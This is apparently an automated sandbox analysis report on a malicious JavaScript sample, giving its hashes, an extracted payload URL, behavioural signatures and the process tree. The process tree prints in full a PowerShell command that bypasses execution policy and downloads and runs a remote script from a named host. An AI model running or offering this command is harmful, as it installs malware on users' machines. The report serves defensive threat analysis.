Analysis
-
max time kernel
120s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05-03-2024 02:46
Static task
static1
Behavioral task
behavioral1
Sample
cf46300bc79f7d868887c54856589b2e4551dee3bae7feabd5251e40c9eca364.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
cf46300bc79f7d868887c54856589b2e4551dee3bae7feabd5251e40c9eca364.js
Resource
win10v2004-20240226-en
General
-
Target
cf46300bc79f7d868887c54856589b2e4551dee3bae7feabd5251e40c9eca364.js
-
Size
66KB
-
MD5
b351c5ff3faa7b8950fb3f79000fbd6d
-
SHA1
7848bb60598db2754f14fa1c52580557e630f11f
-
SHA256
cf46300bc79f7d868887c54856589b2e4551dee3bae7feabd5251e40c9eca364
-
SHA512
96c96e5d501f63f33dd3be7b7d2e5a974dd6d1c0e3a342e5ac7c23cc358f678e466ae7a1302e1176b1478a4e3530d97ee4f1718a5f27caf02425da4ff1766901
-
SSDEEP
1536:C+HdiDQwLyieMnKYjk5bkzkfc7wchjkJxjqKVzM2sBJ3rASeFaM+bVy0vE+1zxiP:C+yq9YEZlhaPbVyoE2FeqyCIVowLrH8q
Malware Config
Extracted
https://compactgrill.hu/care.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 964 powershell.exe 4 964 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 964 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 964 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2876 wrote to memory of 964 2876 wscript.exe 28 PID 2876 wrote to memory of 964 2876 wscript.exe 28 PID 2876 wrote to memory of 964 2876 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\cf46300bc79f7d868887c54856589b2e4551dee3bae7feabd5251e40c9eca364.js1⤵
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://compactgrill.hu/care.txt')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:964
-